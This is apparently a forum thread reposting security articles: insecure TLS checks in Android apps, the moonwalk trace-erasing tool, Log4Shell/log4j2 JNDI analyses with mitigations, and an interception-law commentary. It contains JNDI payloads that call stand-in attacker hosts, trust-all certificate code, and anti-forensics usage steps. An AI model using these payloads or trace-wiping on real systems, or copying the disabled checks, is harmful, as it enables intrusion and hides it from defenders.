The WebView widget is a popular choice for situations where HTML data received from a web server should be displayed to the user. The code snippet below shows how the WebView's WebViewClient implementation is substituted by a custom client that modifies the callback responsible for SSL error handling. This method is invoked when Android doesn't trust the TLS certificates provided by the target server, giving the implementer the choice to either proceed() with the connection or cancel() it.

    Thus, when your app needs to deal with a certificate that is untrusted by the operating system, overriding this error handler allows deviating from the default behavior. Ignoring the error and proceeding with every connection is a frequently proposed quick fix suggested in various places, such as the previously linked StackOverflow thread. As a result, the entire certificate verification process is nullified.

    binding.webview.webViewClient = object : WebViewClient() {
        override fun onReceivedSslError(
            view: WebView?,
            handler: SslErrorHandler?,
            error: SslError?
        ) {
            handler?.proceed()
        }
    }

Now let's have a look at the video below: when the MITM proxy is activated by running the start.sh script, you can see that further HTTPS requests suddenly result in a very different text being displayed in the WebView. This is a result of the traffic manipulation executed by the malicious actor. The user has no way of finding out about the dangerous situation. The transmitted password is intercepted by the MITM entity, who can use it however they like, while the user receives the modified password without any idea that it was altered.

    insecure-webview

    Malfunctioning X509TrustManager Implementations

If any communication with a server should happen securely over HTTPS without a WebView, the usual way of establishing the connection is using the HttpsURLConnection class. Similar to the WebView connection client, this approach also verifies the server's TLS certificate based on the certificate authorities known to Android. In our case, the certificate would not be accepted by default, as it has been issued by a custom certificate authority. This results in an SSLException being thrown when attempting to start the connection.

Thus, similarly to how the WebViewClient implementation can be overridden, we can instruct the HttpsURLConnection to use a custom X509TrustManager implementation that is responsible for verifying the TLS certificate trustworthiness:

val insecureTrustManager = object : X509TrustManager {
    override fun checkClientTrusted(
        chain: Array<X509Certificate>?,
        authType: String?
    ) {
        // do nothing
    }

    override fun checkServerTrusted(
        chain: Array<X509Certificate>?,
        authType: String?
    ) {
        // do nothing
    }

    override fun getAcceptedIssuers(): Array<X509Certificate>? = null
}
val context = SSLContext.getInstance("TLSv1.3")
context.init(null, arrayOf(insecureTrustManager), SecureRandom())

val url = URL("https://www.mitmtest.com")
val connection = url.openConnection() as HttpsURLConnection
connection.sslSocketFactory = context.socketFactory

    The easiest but most insecure solution to get rid of the SSLException, often proposed publicly, is to use the implementation shown above, which simply does nothing. This is equivalent to deeming every server as trustworthy. The correct behavior would be to throw an exception in case an invalid certificate is presented. But if the app doesn’t do this, the actual certificate checking gets neglected. Attackers can then freely intercept and modify the transferred data without any problems, as shown in the video. Of course, you can also create a secure trust manager implementation that accepts certificates issued by a custom CA, but this is a topic we will explore in the next blog post.
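For contrast, here is a hedged sketch of the safe direction, written in plain Java with illustrative names: instead of a do-nothing trust manager, load the custom CA into its own trust store and let the platform's default X509TrustManager logic validate the full chain against it, keeping chain and expiry checks intact.

```java
import java.io.InputStream;
import java.security.KeyStore;
import java.security.cert.CertificateFactory;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;

// Sketch: trust a custom CA without weakening certificate validation.
public class CustomCaTrust {
    // Trust managers backed by the given trust store; a null store falls
    // back to the platform's default CA set.
    static TrustManager[] trustManagersFor(KeyStore trustStore) throws Exception {
        TrustManagerFactory tmf =
            TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(trustStore);
        return tmf.getTrustManagers();
    }

    // In-memory trust store containing only the custom CA (PEM or DER input).
    static KeyStore customCaStore(InputStream caCert) throws Exception {
        KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
        ks.load(null, null); // start from an empty in-memory keystore
        ks.setCertificateEntry("custom-ca",
            CertificateFactory.getInstance("X.509").generateCertificate(caCert));
        return ks;
    }

    static SSLContext contextFor(InputStream caCert) throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLSv1.3");
        // Only the set of trusted roots changes; how certificates are
        // checked stays the platform default.
        ctx.init(null, trustManagersFor(customCaStore(caCert)), null);
        return ctx;
    }
}
```

Assigning the resulting context's socket factory to an HttpsURLConnection then accepts the custom CA's certificates while still rejecting everything else.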

    insecure-trustmanager

    Disabled Host Name Checks

    Another way TLS certificate checking can be made insecure is if the host name verification process is skipped. In this case, the certificate validation process is not fully disabled like in the previous case. In fact, any certificate that was issued by an untrusted certificate authority will be rejected.

    However, there is another crucial step when validating a certificate: Not only does the certificate have to be signed by a trusted CA, it also needs to be issued specifically for use with the exact URL that is currently being accessed. If this step is skipped, a malicious actor can use their legitimately received certificate for “malicious.com” to pretend they are actually “google.com”. There should never be any need to do so, but a common way of turning off the host name verification is shown in the snippet below:

    val url = URL("https://wrong.host.badssl.com")
    val conn = url.openConnection() as HttpsURLConnection
    
    // Create HostnameVerifier that accepts everything
    conn.hostnameVerifier = HostnameVerifier { hostname, session -> true }

    As shown in the video below, when a website is visited whose TLS certificate has not been issued for the target host name, the above configuration still establishes a connection without any warnings or exceptions. If you try connecting to https://wrong.host.badssl.com using your own browser, you will see that the connection is refused exactly because the host name verification failed (e.g. in Google Chrome, this is called ERR_CERT_COMMON_NAME_INVALID).
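Note that host name verification is only applied automatically by HttpsURLConnection and similar high-level clients. If you ever build connections from raw SSLSocket or SSLEngine objects, it is off by default and must be switched on explicitly via the standard endpoint identification API, as in this minimal sketch (the class and method names are illustrative):

```java
import javax.net.ssl.SSLParameters;

// Sketch: explicitly enable host name verification for hand-built TLS
// connections (apply the returned parameters to an SSLSocket/SSLEngine).
public class EndpointIdentification {
    static SSLParameters httpsParams() {
        SSLParameters params = new SSLParameters();
        // "HTTPS" enables RFC 2818-style host name matching in the handshake.
        params.setEndpointIdentificationAlgorithm("HTTPS");
        return params;
    }
}
```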

    insecure-hostnameverifier

    Avoiding Vulnerabilities in Network-Facing Android Apps

When your app needs to communicate with a backend server, you should always use encrypted and authenticated channels like TLS in order to protect your users from eavesdropping and manipulation of traffic. In IT security, it is best practice to use well-established procedures and libraries instead of custom implementations, to minimize the risk of security issues. That's why it's safer to use well-known TLS libraries and leverage generally trusted certificate authorities.

    Using custom certificate authorities should be avoided as much as possible. They should only be used as a last resort in your security infrastructure, since using them makes the certificate verification process more error-prone. When you try to force Android to accept your custom certificates and establish a connection to the server, several things can go wrong.

    For example, implementation errors could include skipping parts of the required certificate checking process or using workarounds for runtime exceptions by disabling certificate checks completely. This can allow attackers to intercept the encrypted traffic without the user noticing, as we have seen in the examples above.

    But if using a custom certificate is the only option you have, your main focus should not be to establish the connection at any cost. Instead, you should focus on enforcing strict verification of the chain of trust. Avoiding crashes due to SSLExceptions by simply skipping all certificate checks is a very dangerous approach.

We hope that our findings and hands-on examples helped increase awareness of the need for secure TLS certificate checking implementations. If you are curious about properly making your Android app connect to servers that use certificates issued by custom certificate authorities, then make sure to check out our upcoming blog post.

     

    Sursa: https://www.guardsquare.com/blog/insecure-tls-certificate-checking-in-android-apps

  11. moonwalk

    Cover your tracks during Linux Exploitation / Penetration Testing by leaving zero traces on system logs and filesystem timestamps.

    146671442-78bb6781-b283-4f43-8754-d1d3b62ae627.gif 146671305-5ffc26b4-1e0e-4436-9a1e-1e0dfc81f40e.gif

    📖 Table of Contents

    ℹ️ Introduction

    moonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine. It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.

    ⚠️ NOTE: This tool is open-sourced to assist solely in Red Team operations and in no means is the author liable for repercussions caused by any prohibited use of this tool. Only make use of this in a machine you have permission to test.

    Features

    • Small Executable: Get started quickly with a curl fetch to your target machine.
    • Fast: Performs all session commands including logging, trace clearing, and filesystem operations in under 5 milliseconds.
    • Reconnaissance: To save the state of system logs, moonwalk finds a world-writable path and saves the session under a dot directory which is removed upon ending the session.
    • Shell History: Instead of clearing the whole history file, moonwalk reverts it back to how it was, including the invocation of moonwalk.
    • Filesystem Timestamps: Hide from the Blue Team by reverting the access/modify timestamps of files back to how it was using the GET command.

    Installation

    $ curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
    

    (AMD x86-64)

    OR

    Download the executable from Releases OR Install with cargo:

    $ cargo install --git https://github.com/mufeedvh/moonwalk.git
    

    Install Rust/Cargo

    Build From Source

    Prerequisites:

    • Git
    • Rust
    • Cargo (Automatically installed when installing Rust)
    • A C linker (Only for Linux, generally comes pre-installed)
    $ git clone https://github.com/mufeedvh/moonwalk.git
    $ cd moonwalk/
    $ cargo build --release
    

The first command clones this repository onto your local machine, and the last two commands enter the directory and build the source in release mode.

    Usage

    146672354-9db1e7e5-bb8a-43e5-8b64-b2d1bbea547e.png

    Once you get a shell into the target Unix machine, start a moonwalk session by running this command:

    $ moonwalk start
    

    While you're doing recon/exploitation and messing with any files, get the touch timestamp command of a file beforehand to revert it back after you've accessed/modified it:

    $ moonwalk get ~/.bash_history
    
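What the get command enables can be approximated with plain GNU coreutils: save a timestamp reference before touching a file, then restore it afterwards. This is an illustration of the idea, not moonwalk's actual mechanism, and the file paths are stand-ins:

```shell
# Illustration only: approximate `moonwalk get` with GNU coreutils.
f=$(mktemp)                          # stand-in for a file you are about to touch
cp -p "$f" "$f.stamp"                # -p preserves the access/modify timestamps
sleep 1                              # make sure the tampering changes the mtime
echo tampered >> "$f"                # simulated access/modification
touch -r "$f.stamp" "$f"             # revert the timestamps from the reference copy
[ "$(stat -c '%Y' "$f")" = "$(stat -c '%Y' "$f.stamp")" ] && echo "timestamp reverted"
```

moonwalk automates this (together with shell history and log state) in a single session; the snippet only mirrors the timestamp part.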

    Post-exploitation, clear your traces and close the session with this command:

    $ moonwalk finish
    

    That's it!

    Contribution

    Ways to contribute:

    • Suggest a feature
    • Report a bug
    • Fix something and open a pull request
    • Help me document the code
    • Spread the word
    • Find something I missed which leaves any trace!

    License

    Licensed under the MIT License, see LICENSE for more information.

    Liked the project?

    Support the author by buying him a coffee!

    Buy Me A Coffee


    Support this project by starring ⭐, sharing 📲, and contributing 👩‍💻❤️

     

    Sursa: https://github.com/mufeedvh/moonwalk

  12. Windows Heap-Backed Pool: The Good, The Bad, and the Encoded

    For decades, the Windows kernel pool remained the same, using simple structures that were easy to read, parse, and search for. Recently this all changed, with a new and complex design that breaks assumptions and exploits, and of course tools and debugger extensions. But could this open up a whole new attack surface as well? By: Yarden Shafir. Full Abstract & Presentation Materials: https://www.blackhat.com/us-21/briefings/schedule/#windows-heap-backed-pool-the-good-the-bad-and-the-encoded-23482

  13. Ghidra 10.1

     Latest release, published by @ghidra1 3 hours ago · 53 commits to master since this release
     
     
  14. Speed through the log4j2 JNDI injection vulnerability~

     

    Word count: 1.5k · Reading time: 6 min · 2021/12/10

    On December 9, 2021, a disaster comparable to EternalBlue swept through the Java world: a JNDI injection vulnerability in Log4j2 was disclosed. The difficulty of exploiting it is breathtakingly low, basically on par with the Struts2 (S2) bugs.

    Unlike S2, Log4j2 is used by a huge number of Java frameworks and applications as the basic third-party logging library. As long as Log4j2 is used for log output and part of the logged content is attacker-controlled, the application may be vulnerable. The vulnerability therefore affects a large number of common applications and components around the world, such as:
    Apache Struts2
    Apache Solr
    Apache Druid
    Apache Flink
    Apache Flume
    Apache Dubbo
    Apache Kafka
    Spring-boot-starter-log4j2
    ElasticSearch
    Redis
    Logstash

    Let's take a look at how the vulnerability works.

    Vulnerability analysis

    Set up the environment

    We pick log4j-core version 2.14.1 and construct a simple test environment:

    package top.bigking.log4j2attack.service;

    import lombok.extern.slf4j.Slf4j;

    @Slf4j
    public class HelloService {
        public static void main(String[] args) {
            System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
            System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
            log.error("${jndi:rmi://127.0.0.1:1099/ruwsfb}");
        }
    }

    Spring Boot needs to exclude its default logging and add log4j2 (a common configuration):

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter</artifactId>
        <exclusions>
            <!-- Remove Spring Boot's default logging -->
            <exclusion>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-logging</artifactId>
            </exclusion>
        </exclusions>
    </dependency>

    <dependency>
        <!-- Introduce the log4j2 dependency -->
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-log4j2</artifactId>
    </dependency>

    Executing this triggers the vulnerability.

    Code analysis

    Causes of Vulnerability

    We start by following the error() call as usual.

    First, note the isEnabled check here. This is why many people's info() calls fail to trigger the bug: if the configured log level is not met, the message is never processed.

    Following the call chain leads to the format function of MessagePatternConverter.

    Here is the entry point of the vulnerability: if the message contains ${, it receives additional processing. We continue into the substitute function of StrSubstitutor.

    This is the main part of the vulnerability: the template syntax is processed recursively, along with some built-in syntax.

    prefixMatcher is ${
    suffixMatcher is }

    Only when both delimiters are found does the content enter syntax processing.

    The content between the braces is assigned to varname.

    Two built-in delimiter syntaxes are then handled:

    public static final String DEFAULT_VALUE_DELIMITER_STRING = ":-";
    public static final StrMatcher DEFAULT_VALUE_DELIMITER = StrMatcher.stringMatcher(":-");
    public static final String ESCAPE_DELIMITER_STRING = ":\\-";
    public static final StrMatcher DEFAULT_VALUE_ESCAPE_DELIMITER = StrMatcher.stringMatcher(":\\-");
    


    If either of these syntaxes matches, varname is rewritten to the corresponding part of the expression (an important bypass primitive).

    The processed variable then enters the resolveVariable function on line 418.

    Inside resolveVariable, the matching lookup is invoked directly according to the protocol; the jndi lookup is what causes the vulnerability.

    If the lookup returns a value, it enters the next level of recursive processing on line 427.

    The lookup supports many protocols: {date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j}

    Stepping through this flow, it is not hard to see that the whole process contains many logical weaknesses.

    Some simple bypasses

    So far we have analyzed the processing of the payload ${jndi:rmi://127.0.0.1:1099/ruwsfb}.

    But many parts of the code show that the processing is recursive; in other words, we can nest ${} expressions and have the returned value processed again.

    For example, we can use the lower lookup and splice its return value into the payload.

    This executes just the same.

    The built-in special syntax works as well.

    The first half is treated as varname, and the second half is returned to replace the original result for the next round of splicing, so new payloads can be constructed.
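To see why nesting works, here is a toy Python model of the recursive ${...} substitution (a simplified sketch, not log4j's actual StrSubstitutor; the lookup table and the "would perform JNDI lookup" marker are our own assumptions, purely illustrative):

```python
import re

# Toy lookup table; real log4j supports many more protocols
# (date, sys, env, ...). The jndi marker string is illustrative only.
LOOKUPS = {
    "lower": str.lower,
    "upper": str.upper,
    "jndi": lambda url: f"<would perform JNDI lookup: {url}>",
}

# Matches the innermost ${...} (content with no nested delimiters).
PATTERN = re.compile(r"\$\{([^${}]*)\}")

def resolve(var: str) -> str:
    if ":-" in var:                       # the ":-" default-value syntax
        _name, default = var.split(":-", 1)
        return default                    # toy behavior: fall back to the default
    if ":" in var:
        prefix, rest = var.split(":", 1)
        fn = LOOKUPS.get(prefix)
        if fn:
            return fn(rest)
    return ""                             # unresolvable: drop it

def substitute(s: str, max_rounds: int = 20) -> str:
    # Replace the innermost ${...} repeatedly, mimicking the recursion.
    for _ in range(max_rounds):
        m = PATTERN.search(s)
        if not m:
            break
        s = s[:m.start()] + resolve(m.group(1)) + s[m.end():]
    return s

print(substitute("${lower:JNDI}"))                        # jndi
print(substitute("${${lower:JN}${lower:DI}:rmi://x/a}"))  # reassembles into a jndi lookup
print(substitute("${nosuch:-${lower:ABC}}"))              # abc (the ":-" fallback)
```

The second call shows the bypass mechanic: the inner lookups resolve first, their results are spliced back in, and the reassembled ${jndi:...} is then resolved on the next round, which is why filters matching the literal string "jndi" are easy to evade.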

    The developers even added fault-tolerant code: characters that do not meet the conditions are simply deleted.

    Due to some special regulations, I will not announce the relevant bypass payload here. If you understand this part of the code, you can easily construct it.

    2.15.0 rc1 fix

    A patch for this vulnerability was actually released a few days ago, and I had noticed it at the time, but I did not expect the exploitation logic to be this simple.

    As the vulnerability caused a storm across the security community, more and more people focused their attention here, and the rc1 fix was soon bypassed. The bypass is actually quite interesting; let's look at the patch.

    The patch and its test samples are quite interesting.

    To put it simply: in the patched handling logic, if you find a way to make it throw an error, the catch branch skips the safe processing and goes straight into the lookup.

    😆

    Repair plan

    1. At present, Apache has officially released only 2.15.0-rc2 and packaged the 2.15.0 release. There is no guarantee it will not be bypassed a second time, and this version is said to have compatibility issues.
    https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

    2. The common mitigation currently focuses on configuration changes: add the following to the project's log4j2.component.properties file:

    log4j2.formatMsgNoLookups = true
    

    Note that this setting only takes effect in version 2.10.0 and above.

    You can also pass the setting as a JVM startup option:

    -Dlog4j2.formatMsgNoLookups = true
    

    3. In addition, you may have to rely on major WAFs

    Write at the end

    In fact, the vulnerability was patched on December 6 and spread widely on Twitter. My first reaction was that such a serious problem was impossible, that there must be heavy restrictions on exploitation. In reality exploitation is very simple, and it swept through Java projects all at once.

    As a foundational component referenced by most Java frameworks and applications, it exposed a huge number of problems at once. Just an hour after the workday ended, the payload was already circulating. Were it not for the fact that going from a JNDI lookup to RCE is not that easy, many services would probably have fallen overnight.

    Since the vendor had not yet shipped a fixed release, early on this vulnerability could only be defended against by WAFs. Organizations with weak security operations could do little but wait it out. That feeling is hard to appreciate without living through a hole this big. (When will 360 rise?)

  15. Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package

    December 9, 2021 · 7 min read
    Free Wortley
    CEO at LunaSec
    Chris Thompson
    Developer at Lunasec

    Log4Shell Logo

    Updated @ December 10th, 10am PST

    A few hours ago, a 0-day exploit in the popular Java logging library log4j2 was discovered that results in Remote Code Execution (RCE) by logging a certain string.

    Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the severity of this vulnerability is extreme. We're calling it "Log4Shell" for short.

    The 0-day was tweeted along with a PoC posted on GitHub. It has since been published as CVE-2021-44228.

    This post provides resources to help you understand the vulnerability and how to mitigate it for yourself.

    Who is impacted?

    Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable.

    Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach.

    Many Open Source projects like the Minecraft server, Paper, have already begun patching their usage of log4j2.

    Simply changing an iPhone's name has been shown to trigger the vulnerability in Apple's servers.

    Updates (3 hours after posting): According to this blog post (see translation), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load remote code using LDAP.

    However, there are other attack vectors targeting this vulnerability which can result in RCE. An attacker could still leverage existing code on the server to execute a payload. An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post.

    Affected Apache log4j2 Versions

    2.0 <= Apache log4j <= 2.14.1

    Permanent Mitigation

    Version 2.15.0 of log4j has been released without the vulnerability. log4j-core.jar is available on Maven Central, along with release notes and log4j security announcements.

    The release can also be downloaded from the Apache Log4j Download page.

    Temporary Mitigation

    As per this discussion on HackerNews:

    The 'formatMsgNoLookups' property was added in version 2.10.0, per the JIRA Issue LOG4J2-2109 [1] that proposed it. Therefore the 'formatMsgNoLookups=true' mitigation strategy is available in version 2.10.0 and higher, but is no longer necessary with version 2.15.0, because it then becomes the default behavior [2][3].

    If you are using a version older than 2.10.0 and cannot upgrade, your mitigation choices are:

    • Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files, see details at https://issues.apache.org/jira/browse/LOG4J2-2109 or,

    • Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's classloading documentation to understand this behavior.
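A widely used way to apply that second option is to delete JndiLookup.class from the jar (commonly done with `zip -q -d`). Below is a hedged Python equivalent using the standard `zipfile` module; since `zipfile` cannot delete entries in place, it rewrites the archive without the class (the jar filename in the usage note is hypothetical):

```python
import os
import shutil
import zipfile

# Path of the class removed by the well-known mitigation.
TARGET = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def strip_jndilookup(jar_path: str) -> bool:
    """Rewrite the jar without JndiLookup.class; return True if it was removed."""
    tmp = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, \
         zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename == TARGET:
                removed = True
                continue                      # skip the vulnerable class
            dst.writestr(item, src.read(item.filename))
    if removed:
        shutil.move(tmp, jar_path)            # replace the original jar
    else:
        os.remove(tmp)                        # nothing to strip, keep the original
    return removed

# Usage (hypothetical jar name):
#   strip_jndilookup("log4j-core-2.14.1.jar")
```

Test the application afterwards: code paths that actually use JNDI lookups will start throwing ClassNotFoundException.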

    How the exploit works

    Exploit Requirements

    • A server with a vulnerable log4j version (listed above),
    • an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string,
    • and a log statement that logs out the string from that request.

    Example Vulnerable Code

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    
    import java.io.*;
    import java.sql.SQLException;
    import java.util.*;
    
    public class VulnerableLog4jExampleHandler implements HttpHandler {
    
      static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
    
      /**
       * A simple HTTP endpoint that reads the request's User Agent and logs it back.
       * This is basically pseudo-code to explain the vulnerability, and not a full example.
       * @param he HTTP Request Object
       */
      public void handle(HttpExchange he) throws IOException {
        String userAgent = he.getRequestHeader("user-agent");
        
        // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
        // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
        log.info("Request User Agent:{}", userAgent);
    
        String response = "<h1>Hello There, " + userAgent + "!</h1>";
        he.sendResponseHeaders(200, response.length());
        OutputStream os = he.getResponseBody();
        os.write(response.getBytes());
        os.close();
      }
    }
    

    Reproducing Locally

    If you want to reproduce this vulnerability locally, you can refer to christophetd's vulnerable app.

    In a terminal run:

    docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
    

    and in another:

    curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
    

    the logs should include an error message indicating that a remote lookup was attempted but failed:

    2021-12-10 17:14:56,207 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
    

    Exploit Steps

    1. Data from the User gets sent to the server (via any protocol),
    2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
    3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
    4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
    5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

    Due to how common Java vulnerabilities such as these are, security researchers have created tools to easily exploit them. The marshalsec project is one of many that demonstrates generating an exploit payload that could be used for this vulnerability. You can refer to this malicious LDAP server for an example of exploitation.
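A first-pass way to hunt for these probes in your own logs is a simple pattern match; the sketch below is a naive illustration (the regex is our own, not an official signature), and its last example shows why such matching is easily evaded:

```python
import re

# Naive detector for classic Log4Shell probes in log lines.
# Caveat: nested-lookup obfuscation such as ${${lower:j}ndi:...}
# evades this pattern, which is exactly why simple WAF rules were bypassed.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def looks_like_log4shell(line: str) -> bool:
    return bool(JNDI_RE.search(line))

print(looks_like_log4shell("GET / UA=${jndi:ldap://attacker.com/a}"))  # True
print(looks_like_log4shell("GET / UA=Mozilla/5.0"))                    # False
print(looks_like_log4shell("${${lower:j}ndi:ldap://x/a}"))             # False (evaded)
```

Treat a match as a probe attempt, not proof of compromise; and treat the absence of matches as no guarantee, given the obfuscation shown above.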

    How to identify if your server is vulnerable

    Using a DNS logger (such as dnslog.cn), you can generate a domain name and use this in your test payloads:

    curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.dnslog.cn/a}'
    

    Refreshing the page will show DNS queries which identify hosts who have triggered the vulnerability.

    CAUTION

    While dnslog.cn has become popular for testing log4shell, we advise caution. When testing sensitive infrastructure, information sent to this site could be used by its owner to catalogue and later exploit it.

    If you wish to test more discretely, you may setup your own authoritative DNS server for testing.

    More information

    You can follow us on Twitter where we'll continue to update you as information about the impact of this exploit becomes available.

    For now, we're just publishing this to help raise awareness and get people patching it. Please tell any of your friends running Java software!

    Limit your vulnerability to future attacks

    LunaSec is an Open Source Data Security framework that isolates and protects sensitive data in web applications. It limits vulnerability to attacks like Log4Shell and can help protect against future 0-days, before they happen.

    Editing this post

    If you have any updates or edits you'd like to make, you can edit this post as Markdown on GitHub. And please throw us a Star !


    Edits

    1. Updated the "Who is impacted?" section to include mitigating factor based on JDK version, but also suggest other exploitation methods are still prevalent.
    2. Named the vulnerability "LogJam", added CVE, and added link to release tags.
    3. Update mitigation steps with newer information.
    4. Removed the name "LogJam" because it's already been used. Using "Log4Shell" instead.
    5. Update that 2.15.0 is released.
    6. Added the MS Paint logo[4], and updated example code to be slightly more clear (it's not string concatenation).
    7. Reported on iPhones being affected by the vulnerability, and included local reproduction code + steps.
    8. Update social info.
    9. Updated example code to use Log4j2 syntax.

    References

    [1] https://issues.apache.org/jira/browse/LOG4J2-2109

    [2] https://github.com/apache/logging-log4j2/pull/607/files

    [3] https://issues.apache.org/jira/browse/LOG4J2-3198

    [4] Kudos to @GossiTheDog for the MS Paint logo!

    Also kudos to @80vul for tweeting about this.

     

    Sursa: https://www.lunasec.io/docs/blog/log4j-zero-day/

  16. Expanded interception of communications – slipped in quietly by the Government

    • Posted on: 9 December 2021
    •  
    • By: Bogdan Manolea

    A new article (appearing out of nowhere in a law that was supposed to regulate something else entirely) unjustifiably broadens the scope and reach of the interception of electronic communications, including access to traffic data, content data, and "the content of transited encrypted communications".

    The article was added to a draft law adopted by the Cîțu Government just 3 days before it was dismissed by Parliament, and the draft passed the Chamber of Deputies without a single opposing amendment.

    I. Mega-boring, really.

    Only by chance did we look through a 300-page legal-technical text that is relatively boring even for lawyers used to the telecom field.

    The draft law transposing EU Directive 2018/1972 (the European Electronic Communications Code), which in fact replaces 4 other directives, is a mega legislative project whose measures are mostly of interest only to those who follow the electronic communications field and what ANCOM does.

    The Ministry of Transport and Communications had the draft in public consultation since November 2020 (including an online meeting) and included in it other regulations of interest to the same field (some clarifications to the infrastructure law, the My ANCOM service), giving it the generic name "Draft Law for amending and supplementing certain normative acts in the field of electronic communications and for establishing measures to facilitate the development of electronic communications networks". Mega-boring, really.

    Although the directive was supposed to be transposed by 21 December 2020, it sat somewhere in the Government for almost a year, until USR left the coalition. Then, just 3 days before being dismissed (coincidence or not?!?), the Cîțu Government suddenly adopted it in its last cabinet meeting. It then entered the parliamentary circuit, sailed through the Chamber of Deputies, and was adopted on 7 December 2021. Mega-boring, really.

    II. And the devil is in 10^2

    Except that between the version in public consultation and the one adopted by the government, a new addition appears in the explanatory memorandum called "Legislative changes relevant to the field of national security" (sic!), two definitions (evidently written by people who have never worked in the field, judging by the utterly improper wording), and Article 10^2, inserted in a section that has nothing to do with the subject of the other 299 pages:

    Art. 10^2. — (1) Providers of electronic hosting services with IP resources and providers of number-independent interpersonal communications services are obliged to support law enforcement bodies and bodies with responsibilities in the field of national security, within the limits of their competences, in the enforcement of technical surveillance methods or authorization acts ordered in accordance with the provisions of Law no. 135/2010 on the Code of Criminal Procedure, as subsequently amended and supplemented, and of Law no. 51/1991 on national security, republished, as subsequently amended and supplemented, namely:

    a) to allow the lawful interception of communications, including bearing the related costs;

    b) to grant access to the content of encrypted communications transiting their own networks;

    c) to provide the retained or stored information regarding traffic data, subscriber or customer identification data, payment methods, and access history with the corresponding timestamps;

    d) in the case of providers of electronic hosting services with IP resources, to allow access to their own computer systems, for the purpose of copying or extracting existing data.

    (2) The obligations provided in paragraph (1) letters a)–c) apply correspondingly to providers of electronic communications networks or services.

     

    III. Who are they???

    For those lost in a text that looks like an acrostic but is not, let us explain three terms:

    "Providers of electronic hosting services with IP resources" – these are in fact the same as web hosting providers (already regulated by Law 365/2002), who offer services "on the territory of Romania" according to the newly invented definition in Article 4 paragraph (1), new point 9^5.

    "Number-independent interpersonal communications service" – this is what a few years ago was called "instant messaging or chat", and it basically covers Skype, WhatsApp, Facebook Messenger, Signal, Wire, Telegram or, for the more nostalgic, Yahoo Messenger, AIM, ICQ or even IRC. For a more, shall we say, creative mind, even Chaturbate or LiveJasmin would be interpersonal communications services fitting perfectly within the half-baked definition in Article 4 paragraph (1), new point 9^3 (so to speak, so their eye gets a rinse too). Note that these are not only the ones offering services "on the territory of Romania". (key word and hint: "transited")

    "Bodies with responsibilities in the field of national security" – the same vague terminology already declared unconstitutional in 2008 (and in other decisions). In any case, nobody can even compile the list of these bodies, let alone their exact powers, the 1991 law being just as vague today.

    IV. What must they do???

    The aspects related to the lawful interception of communications, with all the appropriate safeguards (well, pending new unconstitutionality rulings; I would say the 2016 decision is only the first in a series unless some fundamental problems are fixed), are laid down in the Code of Criminal Procedure (CPP). Logically, if there were a problem or the rules needed updating, that would also be done through an amendment to this code. (Hint: it is an organic law, hard to amend.)

    But beyond imposing similar obligations on other categories of providers (which in any case have nothing to do with ANCOM) through which content, legal and illegal alike, travels in 2021 (perhaps worth discussing, but then it should go in the CPP, not be slipped in quietly), the text greatly broadens the spectrum of interception and access actions beyond what the CPP provides. I will stop at just 2 here:

    • "access to the content of encrypted communications transiting their own networks" does not exist in the CPP.

